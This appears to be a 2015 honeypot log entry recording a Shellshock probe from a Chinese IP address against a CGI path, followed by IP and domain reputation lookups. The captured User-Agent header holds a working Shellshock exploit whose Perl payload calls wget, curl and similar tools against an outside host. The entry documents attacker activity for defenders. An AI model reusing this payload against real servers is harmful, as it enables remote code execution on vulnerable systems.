Saturday, 24 October 2015

218.94.94.86 - Shellshock perl via http://www.testvc.it/TESTONLY

BEGIN OF HTTP DATA:
2015-10-24 04:41:02
Source IP: 218.94.94.86
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget -O /dev/null http://www.testvc.it/TESTONLY; curl -O /dev/null http://www.testvc.it/TESTONLY; fetch http://www.testvc.it/TESTONLY; GET http://www.testvc.it/TESTONLY; lwp-download http://www.testvc.it/TESTONLY; lynx http://www.testvc.it/TESTONLY");'
Host: 109.234.106.8
Connection: Close

218.94.94[.]86

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Center
  • Comment: IP is listed on SANS ISC
  • Comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/218.94.94.86
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

testvc.it

Registrant
Organization:     MADE TO SELL SRL
Address:          VIA VITTORIO EMANUELE 33
                  CALENZANO

62.48.49[.]78

    Static Source: GeoIP data
  • Country: Italy
  • ASN: AS13284 Playnet S.R.L.
    Dynamic Source: SANS Internet Storm Center
  • Comment: IP is listed on SANS ISC
  • Comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.48.49.78